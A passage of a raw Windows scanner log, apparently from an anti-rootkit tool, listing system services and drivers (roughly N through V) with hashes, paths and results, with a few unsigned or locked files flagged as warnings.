00:53:37.0525 4376	NCHSSVAD ( UnsignedFile.Multi.Generic ) - warning
00:53:37.0525 4376	NCHSSVAD - detected UnsignedFile.Multi.Generic (1)
00:53:37.0697 4376	NDIS (1357274d1883f68300aeadd15d7bbb42) C:\Windows\system32\drivers\ndis.sys
00:53:37.0743 4376	NDIS - ok
00:53:37.0931 4376	NdisTapi (0e186e90404980569fb449ba7519ae61) C:\Windows\system32\DRIVERS\ndistapi.sys
00:53:37.0946 4376	NdisTapi - ok
00:53:38.0009 4376	Ndisuio (d6973aa34c4d5d76c0430b181c3cd389) C:\Windows\system32\DRIVERS\ndisuio.sys
00:53:38.0040 4376	Ndisuio - ok
00:53:38.0149 4376	NdisWan (818f648618ae34f729fdb47ec68345c3) C:\Windows\system32\DRIVERS\ndiswan.sys
00:53:38.0180 4376	NdisWan - ok
00:53:38.0227 4376	NDProxy (71dab552b41936358f3b541ae5997fb3) C:\Windows\system32\drivers\NDProxy.sys
00:53:38.0243 4376	NDProxy - ok
00:53:38.0258 4376	NetBIOS (bcd093a5a6777cf626434568dc7dba78) C:\Windows\system32\DRIVERS\netbios.sys
00:53:38.0305 4376	NetBIOS - ok
00:53:38.0461 4376	netbt (ecd64230a59cbd93c85f1cd1cab9f3f6) C:\Windows\system32\DRIVERS\netbt.sys
00:53:38.0492 4376	netbt - ok
00:53:38.0695 4376	Netlogon (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
00:53:38.0711 4376	Netlogon - ok
00:53:38.0867 4376	Netman (c8052711daecc48b982434c5116ca401) C:\Windows\System32\netman.dll
00:53:38.0898 4376	Netman - ok
00:53:38.0991 4376	netprofm (2ef3bbe22e5a5acd1428ee387a0d0172) C:\Windows\System32\netprofm.dll
00:53:39.0023 4376	netprofm - ok
00:53:39.0179 4376	NetTcpPortSharing (d6c4e4a39a36029ac0813d476fbd0248) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
00:53:39.0194 4376	NetTcpPortSharing - ok
00:53:39.0288 4376	nfrd960 (2e7fb731d4790a1bc6270accefacb36e) C:\Windows\system32\drivers\nfrd960.sys
00:53:39.0303 4376	nfrd960 - ok
00:53:39.0350 4376	NisDrv (b52f26bade7d7e4a79706e3fd91834cd) C:\Windows\system32\DRIVERS\NisDrvWFP.sys
00:53:39.0366 4376	NisDrv - ok
00:53:39.0475 4376	NisSrv (290c0d4c4889398797f8df3be00b9698) c:\Program Files\Microsoft Security Client\NisSrv.exe
00:53:39.0615 4376	NisSrv - ok
00:53:39.0756 4376	NlaSvc (2997b15415f9bbe05b5a4c1c85e0c6a2) C:\Windows\System32\nlasvc.dll
00:53:39.0787 4376	NlaSvc - ok
00:53:39.0927 4376	Npfs (d36f239d7cce1931598e8fb90a0dbc26) C:\Windows\system32\drivers\Npfs.sys
00:53:39.0943 4376	Npfs - ok
00:53:40.0083 4376	nsi (8bb86f0c7eea2bded6fe095d0b4ca9bd) C:\Windows\system32\nsisvc.dll
00:53:40.0115 4376	nsi - ok
00:53:40.0146 4376	nsiproxy (609773e344a97410ce4ebf74a8914fcf) C:\Windows\system32\drivers\nsiproxy.sys
00:53:40.0177 4376	nsiproxy - ok
00:53:40.0427 4376	Ntfs (6a4a98cee84cf9e99564510dda4baa47) C:\Windows\system32\drivers\Ntfs.sys
00:53:40.0536 4376	Ntfs - ok
00:53:40.0645 4376	ntrigdigi (e875c093aec0c978a90f30c9e0dfbb72) C:\Windows\system32\drivers\ntrigdigi.sys
00:53:40.0707 4376	ntrigdigi - ok
00:53:40.0785 4376	Null (c5dbbcda07d780bda9b685df333bb41e) C:\Windows\system32\drivers\Null.sys
00:53:40.0817 4376	Null - ok
00:53:40.0895 4376	nvraid (e69e946f80c1c31c53003bfbf50cbb7c) C:\Windows\system32\drivers\nvraid.sys
00:53:40.0910 4376	nvraid - ok
00:53:40.0941 4376	nvstor (9e0ba19a28c498a6d323d065db76dffc) C:\Windows\system32\drivers\nvstor.sys
00:53:40.0957 4376	nvstor - ok
00:53:41.0004 4376	nv_agp (07c186427eb8fcc3d8d7927187f260f7) C:\Windows\system32\drivers\nv_agp.sys
00:53:41.0019 4376	nv_agp - ok
00:53:41.0035 4376	NwlnkFlt - ok
00:53:41.0035 4376	NwlnkFwd - ok
00:53:41.0160 4376	ohci1394 (6f310e890d46e246e0e261a63d9b36b4) C:\Windows\system32\DRIVERS\ohci1394.sys
00:53:41.0191 4376	ohci1394 - ok
00:53:41.0425 4376	p2pimsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
00:53:41.0550 4376	p2pimsvc - ok
00:53:41.0550 4376	p2psvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
00:53:41.0612 4376	p2psvc - ok
00:53:41.0753 4376	Parport (0fa9b5055484649d63c303fe404e5f4d) C:\Windows\system32\drivers\parport.sys
00:53:41.0799 4376	Parport - ok
00:53:41.0862 4376	partmgr (b9c2b89f08670e159f7181891e449cd9) C:\Windows\system32\drivers\partmgr.sys
00:53:41.0877 4376	partmgr - ok
00:53:41.0893 4376	Parvdm (4f9a6a8a31413180d0fcb279ad5d8112) C:\Windows\system32\drivers\parvdm.sys
00:53:41.0971 4376	Parvdm - ok
00:53:42.0033 4376	PcaSvc (c6276ad11f4bb49b58aa1ed88537f14a) C:\Windows\System32\pcasvc.dll
00:53:42.0065 4376	PcaSvc - ok
00:53:42.0158 4376	pci (941dc1d19e7e8620f40bbc206981efdb) C:\Windows\system32\drivers\pci.sys
00:53:42.0174 4376	pci - ok
00:53:42.0189 4376	pciide (1636d43f10416aeb483bc6001097b26c) C:\Windows\system32\drivers\pciide.sys
00:53:42.0205 4376	pciide - ok
00:53:42.0283 4376	pcmcia (3bb2244f343b610c29c98035504c9b75) C:\Windows\system32\DRIVERS\pcmcia.sys
00:53:42.0299 4376	pcmcia - ok
00:53:42.0455 4376	pcouffin (5b6c11de7e839c05248ced8825470fef) C:\Windows\system32\Drivers\pcouffin.sys
00:53:42.0486 4376	pcouffin - ok
00:53:42.0657 4376	PEAUTH (6349f6ed9c623b44b52ea3c63c831a92) C:\Windows\system32\drivers\peauth.sys
00:53:42.0767 4376	PEAUTH - ok
00:53:42.0907 4376	pinger (6dbf2ac2bdaff355995ab25eccc4cfe1) C:\Toshiba\IVP\ISM\pinger.exe
00:53:43.0110 4376	pinger - ok
00:53:43.0344 4376	pla (b1689df169143f57053f795390c99db3) C:\Windows\system32\pla.dll
00:53:43.0500 4376	pla - ok
00:53:44.0061 4376	PlugPlay (c5e7f8a996ec0a82d508fd9064a5569e) C:\Windows\system32\umpnpmgr.dll
00:53:44.0108 4376	PlugPlay - ok
00:53:44.0264 4376	PNRPAutoReg (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
00:53:44.0342 4376	PNRPAutoReg - ok
00:53:44.0342 4376	PNRPsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
00:53:44.0436 4376	PNRPsvc - ok
00:53:44.0623 4376	PolicyAgent (d0494460421a03cd5225cca0059aa146) C:\Windows\System32\ipsecsvc.dll
00:53:44.0654 4376	PolicyAgent - ok
00:53:44.0795 4376	PptpMiniport (ecfffaec0c1ecd8dbc77f39070ea1db1) C:\Windows\system32\DRIVERS\raspptp.sys
00:53:44.0826 4376	PptpMiniport - ok
00:53:45.0013 4376	Processor (0e3cef5d28b40cf273281d620c50700a) C:\Windows\system32\drivers\processr.sys
00:53:45.0075 4376	Processor - ok
00:53:45.0185 4376	ProfSvc (0508faa222d28835310b7bfca7a77346) C:\Windows\system32\profsvc.dll
00:53:45.0216 4376	ProfSvc - ok
00:53:45.0294 4376	ProtectedStorage (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
00:53:45.0309 4376	ProtectedStorage - ok
00:53:45.0450 4376	PSched (99514faa8df93d34b5589187db3aa0ba) C:\Windows\system32\DRIVERS\pacer.sys
00:53:45.0481 4376	PSched - ok
00:53:45.0824 4376	ql2300 (ccdac889326317792480c0a67156a1ec) C:\Windows\system32\drivers\ql2300.sys
00:53:45.0949 4376	ql2300 - ok
00:53:46.0074 4376	ql40xx (81a7e5c076e59995d54bc1ed3a16e60b) C:\Windows\system32\drivers\ql40xx.sys
00:53:46.0089 4376	ql40xx - ok
00:53:46.0230 4376	QWAVE (e9ecae663f47e6cb43962d18ab18890f) C:\Windows\system32\qwave.dll
00:53:46.0245 4376	QWAVE - ok
00:53:46.0308 4376	QWAVEdrv (9f5e0e1926014d17486901c88eca2db7) C:\Windows\system32\drivers\qwavedrv.sys
00:53:46.0323 4376	QWAVEdrv - ok
00:53:46.0386 4376	RasAcd (147d7f9c556d259924351feb0de606c3) C:\Windows\system32\DRIVERS\rasacd.sys
00:53:46.0417 4376	RasAcd - ok
00:53:46.0495 4376	RasAuto (f6a452eb4ceadbb51c9e0ee6b3ecef0f) C:\Windows\System32\rasauto.dll
00:53:46.0526 4376	RasAuto - ok
00:53:46.0651 4376	Rasl2tp (a214adbaf4cb47dd2728859ef31f26b0) C:\Windows\system32\DRIVERS\rasl2tp.sys
00:53:46.0682 4376	Rasl2tp - ok
00:53:46.0760 4376	RasMan (75d47445d70ca6f9f894b032fbc64fcf) C:\Windows\System32\rasmans.dll
00:53:46.0791 4376	RasMan - ok
00:53:46.0916 4376	RasPppoe (509a98dd18af4375e1fc40bc175f1def) C:\Windows\system32\DRIVERS\raspppoe.sys
00:53:46.0932 4376	RasPppoe - ok
00:53:46.0994 4376	RasSstp (2005f4a1e05fa09389ac85840f0a9e4d) C:\Windows\system32\DRIVERS\rassstp.sys
00:53:47.0010 4376	RasSstp - ok
00:53:47.0088 4376	rdbss (b14c9d5b9add2f84f70570bbbfaa7935) C:\Windows\system32\DRIVERS\rdbss.sys
00:53:47.0119 4376	rdbss - ok
00:53:47.0166 4376	RDPCDD (89e59be9a564262a3fb6c4f4f1cd9899) C:\Windows\system32\DRIVERS\RDPCDD.sys
00:53:47.0197 4376	RDPCDD - ok
00:53:47.0291 4376	rdpdr (e8bd98d46f2ed77132ba927fccb47d8b) C:\Windows\system32\drivers\rdpdr.sys
00:53:47.0447 4376	rdpdr - ok
00:53:47.0462 4376	RDPENCDD (9d91fe5286f748862ecffa05f8a0710c) C:\Windows\system32\drivers\rdpencdd.sys
00:53:47.0493 4376	RDPENCDD - ok
00:53:47.0712 4376	RDPWD (79c6df8477250f5c54f7c5ae1d6b814e) C:\Windows\system32\drivers\RDPWD.sys
00:53:47.0743 4376	RDPWD - ok
00:53:47.0821 4376	RemoteAccess (bcdd6b4804d06b1f7ebf29e53a57ece9) C:\Windows\System32\mprdim.dll
00:53:47.0852 4376	RemoteAccess - ok
00:53:48.0071 4376	RemoteRegistry (9e6894ea18daff37b63e1005f83ae4ab) C:\Windows\system32\regsvc.dll
00:53:48.0102 4376	RemoteRegistry - ok
00:53:48.0149 4376	RpcLocator (5123f83cbc4349d065534eeb6bbdc42b) C:\Windows\system32\locator.exe
00:53:48.0164 4376	RpcLocator - ok
00:53:48.0336 4376	RpcSs (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
00:53:48.0398 4376	RpcSs - ok
00:53:48.0554 4376	rspndr (9c508f4074a39e8b4b31d27198146fad) C:\Windows\system32\DRIVERS\rspndr.sys
00:53:48.0601 4376	rspndr - ok
00:53:48.0632 4376	RTL8169 (5163f804256deb8cf1ef64b780a18caa) C:\Windows\system32\DRIVERS\Rtlh86.sys
00:53:48.0695 4376	RTL8169 - ok
00:53:48.0773 4376	SamSs (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
00:53:48.0788 4376	SamSs - ok
00:53:48.0929 4376	sbp2port (3ce8f073a557e172b330109436984e30) C:\Windows\system32\drivers\sbp2port.sys
00:53:48.0944 4376	sbp2port - ok
00:53:49.0038 4376	SCardSvr (77b7a11a0c3d78d3386398fbbea1b632) C:\Windows\System32\SCardSvr.dll
00:53:49.0085 4376	SCardSvr - ok
00:53:49.0256 4376	Schedule (1a58069db21d05eb2ab58ee5753ebe8d) C:\Windows\system32\schedsvc.dll
00:53:49.0319 4376	Schedule - ok
00:53:49.0397 4376	SCPolicySvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
00:53:49.0428 4376	SCPolicySvc - ok
00:53:49.0568 4376	sdbus (8f36b54688c31eed4580129040c6a3d3) C:\Windows\system32\DRIVERS\sdbus.sys
00:53:49.0584 4376	sdbus - ok
00:53:49.0646 4376	SDRSVC (716313d9f6b0529d03f726d5aaf6f191) C:\Windows\System32\SDRSVC.dll
00:53:49.0677 4376	SDRSVC - ok
00:53:49.0709 4376	secdrv (90a3935d05b494a5a39d37e71f09a677) C:\Windows\system32\drivers\secdrv.sys
00:53:49.0755 4376	secdrv - ok
00:53:49.0896 4376	seclogon (fd5199d4d8a521005e4b5ee7fe00fa9b) C:\Windows\system32\seclogon.dll
00:53:49.0943 4376	seclogon - ok
00:53:49.0974 4376	SENS (a9bbab5759771e523f55563d6cbe140f) C:\Windows\system32\sens.dll
00:53:50.0021 4376	SENS - ok
00:53:50.0036 4376	Serenum (68e44e331d46f0fb38f0863a84cd1a31) C:\Windows\system32\drivers\serenum.sys
00:53:50.0099 4376	Serenum - ok
00:53:50.0145 4376	Serial (c70d69a918b178d3c3b06339b40c2e1b) C:\Windows\system32\drivers\serial.sys
00:53:50.0208 4376	Serial - ok
00:53:50.0301 4376	sermouse (8af3d28a879bf75db53a0ee7a4289624) C:\Windows\system32\drivers\sermouse.sys
00:53:50.0333 4376	sermouse - ok
00:53:50.0613 4376	ServiceLayer (56eb980da71b94b79a341615c3c256cf) C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
00:53:50.0629 4376	ServiceLayer ( UnsignedFile.Multi.Generic ) - warning
00:53:50.0629 4376	ServiceLayer - detected UnsignedFile.Multi.Generic (1)
00:53:50.0723 4376	SessionEnv (d2193326f729b163125610dbf3e17d57) C:\Windows\system32\sessenv.dll
00:53:50.0785 4376	SessionEnv - ok
00:53:50.0816 4376	sffdisk (3efa810bdca87f6ecc24f9832243fe86) C:\Windows\system32\DRIVERS\sffdisk.sys
00:53:50.0847 4376	sffdisk - ok
00:53:50.0941 4376	sffp_mmc (8fd08a310645fe872eeec6e08c6bf3ee) C:\Windows\system32\drivers\sffp_mmc.sys
00:53:51.0003 4376	sffp_mmc - ok
00:53:51.0081 4376	sffp_sd (9f66a46c55d6f1ccabc79bb7afccc545) C:\Windows\system32\DRIVERS\sffp_sd.sys
00:53:51.0113 4376	sffp_sd - ok
00:53:51.0128 4376	sfloppy (46ed8e91793b2e6f848015445a0ac188) C:\Windows\system32\drivers\sfloppy.sys
00:53:51.0206 4376	sfloppy - ok
00:53:51.0300 4376	SharedAccess (e1499bd0ff76b1b2fbbf1af339d91165) C:\Windows\System32\ipnathlp.dll
00:53:51.0456 4376	SharedAccess - ok
00:53:51.0518 4376	ShellHWDetection (c7230fbee14437716701c15be02c27b8) C:\Windows\System32\shsvcs.dll
00:53:51.0534 4376	ShellHWDetection - ok
00:53:51.0581 4376	SI3132 (7d494c2000287595d87b9ff6b080d3ff) C:\Windows\system32\DRIVERS\SI3132.sys
00:53:51.0596 4376	SI3132 - ok
00:53:51.0643 4376	SiFilter (df978385397187ba5e5e1c9c56a80a1a) C:\Windows\system32\DRIVERS\SiWinAcc.sys
00:53:51.0659 4376	SiFilter - ok
00:53:51.0705 4376	simptcp (a275fbb7c99458c12e088dff3e58eb4d) C:\Windows\System32\tcpsvcs.exe
00:53:51.0783 4376	simptcp - ok
00:53:51.0799 4376	SiRemFil (aaab072321d75a366269a6d089f3d71e) C:\Windows\system32\DRIVERS\SiRemFil.sys
00:53:51.0815 4376	SiRemFil - ok
00:53:51.0846 4376	sisagp (d2a595d6eebeeaf4334f8e50efbc9931) C:\Windows\system32\drivers\sisagp.sys
00:53:51.0861 4376	sisagp - ok
00:53:51.0893 4376	SiSRaid2 (cedd6f4e7d84e9f98b34b3fe988373aa) C:\Windows\system32\drivers\sisraid2.sys
00:53:51.0908 4376	SiSRaid2 - ok
00:53:51.0955 4376	SiSRaid4 (df843c528c4f69d12ce41ce462e973a7) C:\Windows\system32\drivers\sisraid4.sys
00:53:51.0971 4376	SiSRaid4 - ok
00:53:52.0688 4376	slsvc (862bb4cbc05d80c5b45be430e5ef872f) C:\Windows\system32\SLsvc.exe
00:53:52.0985 4376	slsvc - ok
00:53:53.0515 4376	SLUINotify (6edc422215cd78aa8a9cde6b30abbd35) C:\Windows\system32\SLUINotify.dll
00:53:53.0546 4376	SLUINotify - ok
00:53:53.0765 4376	Smb (7b75299a4d201d6a6533603d6914ab04) C:\Windows\system32\DRIVERS\smb.sys
00:53:53.0796 4376	Smb - ok
00:53:53.0905 4376	SNMPTRAP (2a146a055b4401c16ee62d18b8e2a032) C:\Windows\System32\snmptrap.exe
00:53:53.0921 4376	SNMPTRAP - ok
00:53:54.0061 4376	spldr (7aebdeef071fe28b0eef2cdd69102bff) C:\Windows\system32\drivers\spldr.sys
00:53:54.0077 4376	spldr - ok
00:53:54.0217 4376	Spooler (8554097e5136c3bf9f69fe578a1b35f4) C:\Windows\System32\spoolsv.exe
00:53:54.0233 4376	Spooler - ok
00:53:54.0467 4376	sptd (7f1b7c4d446cd3f926af45b8c48bd593) C:\Windows\system32\Drivers\sptd.sys
00:53:54.0467 4376	Suspicious file (NoAccess): C:\Windows\system32\Drivers\sptd.sys. md5: 7f1b7c4d446cd3f926af45b8c48bd593
00:53:54.0467 4376	sptd ( LockedFile.Multi.Generic ) - warning
00:53:54.0467 4376	sptd - detected LockedFile.Multi.Generic (1)
00:53:54.0591 4376	srv (41987f9fc0e61adf54f581e15029ad91) C:\Windows\system32\DRIVERS\srv.sys
00:53:54.0638 4376	srv - ok
00:53:54.0701 4376	srv2 (ff33aff99564b1aa534f58868cbe41ef) C:\Windows\system32\DRIVERS\srv2.sys
00:53:54.0747 4376	srv2 - ok
00:53:54.0779 4376	srvnet (7605c0e1d01a08f3ecd743f38b834a44) C:\Windows\system32\DRIVERS\srvnet.sys
00:53:54.0794 4376	srvnet - ok
00:53:54.0919 4376	SSDPSRV (03d50b37234967433a5ea5ba72bc0b62) C:\Windows\System32\ssdpsrv.dll
00:53:54.0966 4376	SSDPSRV - ok
00:53:55.0106 4376	SstpSvc (6f1a32e7b7b30f004d9a20afadb14944) C:\Windows\system32\sstpsvc.dll
00:53:55.0153 4376	SstpSvc - ok
00:53:55.0403 4376	StarWindServiceAE (b1691af4a072cb674d600db16dd7308e) C:\Program Files\Alcohol Soft\Alcohol 52\StarWind\StarWindServiceAE.exe
00:53:55.0418 4376	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - warning
00:53:55.0418 4376	StarWindServiceAE - detected UnsignedFile.Multi.Generic (1)
00:53:55.0496 4376	StillCam (ef70b3d22b4bffda6ea851ecb063efaa) C:\Windows\system32\DRIVERS\serscan.sys
00:53:55.0527 4376	StillCam - ok
00:53:55.0652 4376	stisvc (5de7d67e49b88f5f07f3e53c4b92a352) C:\Windows\System32\wiaservc.dll
00:53:55.0715 4376	stisvc - ok
00:53:55.0839 4376	swenum (7ba58ecf0c0a9a69d44b3dca62becf56) C:\Windows\system32\DRIVERS\swenum.sys
00:53:55.0855 4376	swenum - ok
00:53:56.0011 4376	swprv (f21fd248040681cca1fb6c9a03aaa93d) C:\Windows\System32\swprv.dll
00:53:56.0042 4376	swprv - ok
00:53:56.0183 4376	Swupdtmr (327786c5d6bcf284fab14c2b5751f514) c:\Toshiba\IVP\swupdate\swupdtmr.exe
00:53:56.0853 4376	Swupdtmr - ok
00:53:56.0963 4376	Symc8xx (192aa3ac01df071b541094f251deed10) C:\Windows\system32\drivers\symc8xx.sys
00:53:56.0978 4376	Symc8xx - ok
00:53:56.0994 4376	Sym_hi (8c8eb8c76736ebaf3b13b633b2e64125) C:\Windows\system32\drivers\sym_hi.sys
00:53:57.0009 4376	Sym_hi - ok
00:53:57.0025 4376	Sym_u3 (8072af52b5fd103bbba387a1e49f62cb) C:\Windows\system32\drivers\sym_u3.sys
00:53:57.0041 4376	Sym_u3 - ok
00:53:57.0087 4376	SynTP (5efcedcf3daf5c8d9e8b77a34a4eec99) C:\Windows\system32\DRIVERS\SynTP.sys
00:53:57.0103 4376	SynTP - ok
00:53:57.0290 4376	SysMain (9a51b04e9886aa4ee90093586b0ba88d) C:\Windows\system32\sysmain.dll
00:53:57.0337 4376	SysMain - ok
00:53:57.0415 4376	TabletInputService (2dca225eae15f42c0933e998ee0231c3) C:\Windows\System32\TabSvc.dll
00:53:57.0431 4376	TabletInputService - ok
00:53:57.0555 4376	TapiSrv (d7673e4b38ce21ee54c59eeeb65e2483) C:\Windows\System32\tapisrv.dll
00:53:57.0587 4376	TapiSrv - ok
00:53:57.0665 4376	TBS (cb05822cd9cc6c688168e113c603dbe7) C:\Windows\System32\tbssvc.dll
00:53:57.0696 4376	TBS - ok
00:53:57.0961 4376	Tcpip (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\drivers\tcpip.sys
00:53:58.0039 4376	Tcpip - ok
00:53:58.0055 4376	Tcpip6 (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\DRIVERS\tcpip.sys
00:53:58.0133 4376	Tcpip6 - ok
00:53:58.0242 4376	tcpipreg (2c2d4cff5e09c73908f9b5af49a51365) C:\Windows\system32\drivers\tcpipreg.sys
00:53:58.0304 4376	tcpipreg - ok
00:53:58.0351 4376	tdcmdpst (1825bceb47bf41c5a9f0e44de82fc27a) C:\Windows\system32\DRIVERS\tdcmdpst.sys
00:53:58.0382 4376	tdcmdpst - ok
00:53:58.0413 4376	TDPIPE (5dcf5e267be67a1ae926f2df77fbcc56) C:\Windows\system32\drivers\tdpipe.sys
00:53:58.0460 4376	TDPIPE - ok
00:53:58.0523 4376	TDTCP (389c63e32b3cefed425b61ed92d3f021) C:\Windows\system32\drivers\tdtcp.sys
00:53:58.0554 4376	TDTCP - ok
00:53:58.0679 4376	tdx (76b06eb8a01fc8624d699e7045303e54) C:\Windows\system32\DRIVERS\tdx.sys
00:53:58.0710 4376	tdx - ok
00:53:59.0381 4376	TeamViewer6 (fe559178000347d2ca1b7847f0379749) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
00:53:59.0568 4376	TeamViewer6 - ok
00:54:00.0192 4376	TermDD (3cad38910468eab9a6479e2f01db43c7) C:\Windows\system32\DRIVERS\termdd.sys
00:54:00.0207 4376	TermDD - ok
00:54:00.0379 4376	TermService (bb95da09bef6e7a131bff3ba5032090d) C:\Windows\System32\termsrv.dll
00:54:00.0426 4376	TermService - ok
00:54:00.0597 4376	Themes (c7230fbee14437716701c15be02c27b8) C:\Windows\system32\shsvcs.dll
00:54:00.0613 4376	Themes - ok
00:54:00.0707 4376	THREADORDER (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
00:54:00.0753 4376	THREADORDER - ok
00:54:00.0816 4376	tifm21 (28b7f973c36d157a7885b1ae42a4a2a9) C:\Windows\system32\drivers\tifm21.sys
00:54:00.0894 4376	tifm21 - ok
00:54:01.0050 4376	TNaviSrv (38e18dce385ff2ded57423a279559dbc) C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
00:54:01.0268 4376	TNaviSrv ( UnsignedFile.Multi.Generic ) - warning
00:54:01.0268 4376	TNaviSrv - detected UnsignedFile.Multi.Generic (1)
00:54:01.0346 4376	TODDSrv (d540858e65bfa6fded41ad2495ece344) C:\Windows\system32\TODDSrv.exe
00:54:01.0549 4376	TODDSrv ( UnsignedFile.Multi.Generic ) - warning
00:54:01.0549 4376	TODDSrv - detected UnsignedFile.Multi.Generic (1)
00:54:01.0674 4376	TosCoSrv (6a54c28b53c6b50d333c8ee974c6b208) C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
00:54:01.0752 4376	TosCoSrv - ok
00:54:01.0752 4376	Tosrfcom - ok
00:54:01.0830 4376	tos_sps32 (1ea5f27c29405bf49799feca77186da9) C:\Windows\system32\DRIVERS\tos_sps32.sys
00:54:01.0861 4376	tos_sps32 - ok
00:54:01.0877 4376	TpChoice - ok
00:54:02.0001 4376	TrkWks (ec74e77d0eb004bd3a809b5f8fb8c2ce) C:\Windows\System32\trkwks.dll
00:54:02.0033 4376	TrkWks - ok
00:54:02.0189 4376	TrustedInstaller (97d9d6a04e3ad9b6c626b9931db78dba) C:\Windows\servicing\TrustedInstaller.exe
00:54:02.0204 4376	TrustedInstaller - ok
00:54:02.0298 4376	tssecsrv (dcf0f056a2e4f52287264f5ab29cf206) C:\Windows\system32\DRIVERS\tssecsrv.sys
00:54:02.0329 4376	tssecsrv - ok
00:54:02.0376 4376	tunmp (caecc0120ac49e3d2f758b9169872d38) C:\Windows\system32\DRIVERS\tunmp.sys
00:54:02.0423 4376	tunmp - ok
00:54:02.0469 4376	tunnel (300db877ac094feab0be7688c3454a9c) C:\Windows\system32\DRIVERS\tunnel.sys
00:54:02.0485 4376	tunnel - ok
00:54:02.0532 4376	TVALZ (792a8b80f8188aba4b2be271583f3e46) C:\Windows\system32\DRIVERS\TVALZ_O.SYS
00:54:02.0547 4376	TVALZ - ok
00:54:02.0625 4376	uagp35 (c3ade15414120033a36c0f293d4a4121) C:\Windows\system32\drivers\uagp35.sys
00:54:02.0641 4376	uagp35 - ok
00:54:02.0719 4376	udfs (d9728af68c4c7693cb100b8441cbdec6) C:\Windows\system32\DRIVERS\udfs.sys
00:54:02.0750 4376	udfs - ok
00:54:02.0828 4376	UI0Detect (ecef404f62863755951e09c802c94ad5) C:\Windows\system32\UI0Detect.exe
00:54:02.0875 4376	UI0Detect - ok
00:54:02.0984 4376	UleadBurningHelper (332d341d92b933600d41953b08360dfb) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
00:54:02.0984 4376	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - warning
00:54:02.0984 4376	UleadBurningHelper - detected UnsignedFile.Multi.Generic (1)
00:54:03.0109 4376	uliagpkx (75e6890ebfce0841d3291b02e7a8bdb0) C:\Windows\system32\drivers\uliagpkx.sys
00:54:03.0125 4376	uliagpkx - ok
00:54:03.0156 4376	uliahci (3cd4ea35a6221b85dcc25daa46313f8d) C:\Windows\system32\drivers\uliahci.sys
00:54:03.0171 4376	uliahci - ok
00:54:03.0359 4376	UlSata (8514d0e5cd0534467c5fc61be94a569f) C:\Windows\system32\drivers\ulsata.sys
00:54:03.0374 4376	UlSata - ok
00:54:03.0483 4376	ulsata2 (38c3c6e62b157a6bc46594fada45c62b) C:\Windows\system32\drivers\ulsata2.sys
00:54:03.0499 4376	ulsata2 - ok
00:54:03.0608 4376	umbus (32cff9f809ae9aed85464492bf3e32d2) C:\Windows\system32\DRIVERS\umbus.sys
00:54:03.0639 4376	umbus - ok
00:54:03.0780 4376	upnphost (68308183f4ae0be7bf8ecd07cb297999) C:\Windows\System32\upnphost.dll
00:54:03.0827 4376	upnphost - ok
00:54:03.0936 4376	USBAAPL (83cafcb53201bbac04d822f32438e244) C:\Windows\system32\Drivers\usbaapl.sys
00:54:03.0983 4376	USBAAPL ( UnsignedFile.Multi.Generic ) - warning
00:54:03.0983 4376	USBAAPL - detected UnsignedFile.Multi.Generic (1)
00:54:04.0076 4376	usbaudio (32db9517628ff0d070682aab61e688f0) C:\Windows\system32\drivers\usbaudio.sys
00:54:04.0107 4376	usbaudio - ok
00:54:04.0248 4376	usbccgp (caf811ae4c147ffcd5b51750c7f09142) C:\Windows\system32\DRIVERS\usbccgp.sys
00:54:04.0279 4376	usbccgp - ok
00:54:04.0326 4376	usbcir (e9476e6c486e76bc4898074768fb7131) C:\Windows\system32\drivers\usbcir.sys
00:54:04.0388 4376	usbcir - ok
00:54:04.0451 4376	usbehci (79e96c23a97ce7b8f14d310da2db0c9b) C:\Windows\system32\DRIVERS\usbehci.sys
00:54:04.0466 4376	usbehci - ok
00:54:04.0497 4376	usbhub (4673bbcb006af60e7abddbe7a130ba42) C:\Windows\system32\DRIVERS\usbhub.sys
00:54:04.0529 4376	usbhub - ok
00:54:04.0607 4376	usbohci (ce697fee0d479290d89bec80dfe793b7) C:\Windows\system32\DRIVERS\usbohci.sys
00:54:04.0622 4376	usbohci - ok
00:54:04.0716 4376	usbprint (e75c4b5269091d15a2e7dc0b6d35f2f5) C:\Windows\system32\DRIVERS\usbprint.sys
00:54:04.0747 4376	usbprint - ok
00:54:04.0809 4376	usbscan (a508c9bd8724980512136b039bba65e9) C:\Windows\system32\DRIVERS\usbscan.sys
00:54:04.0825 4376	usbscan - ok
00:54:04.0934 4376	USBSTOR (be3da31c191bc222d9ad503c5224f2ad) C:\Windows\system32\DRIVERS\USBSTOR.SYS
00:54:04.0981 4376	USBSTOR - ok
00:54:05.0012 4376	usbuhci (325dbbacb8a36af9988ccf40eac228cc) C:\Windows\system32\DRIVERS\usbuhci.sys
00:54:05.0059 4376	usbuhci - ok
00:54:05.0745 4376	usbvideo (0a6b81f01bc86399482e27e6fda7b33b) C:\Windows\system32\Drivers\usbvideo.sys
00:54:05.0808 4376	usbvideo - ok
00:54:05.0886 4376	UVCFTR (5701a984efa8e209848a6d556dd02933) C:\Windows\system32\DRIVERS\UVCFTR_S.SYS
00:54:05.0901 4376	UVCFTR - ok
00:54:06.0026 4376	UxSms (1509e705f3ac1d474c92454a5c2dd81f) C:\Windows\System32\uxsms.dll
00:54:06.0042 4376	UxSms - ok
00:54:06.0198 4376	vds (cd88d1b7776dc17a119049742ec07eb4) C:\Windows\System32\vds.exe
00:54:06.0276 4376	vds - ok
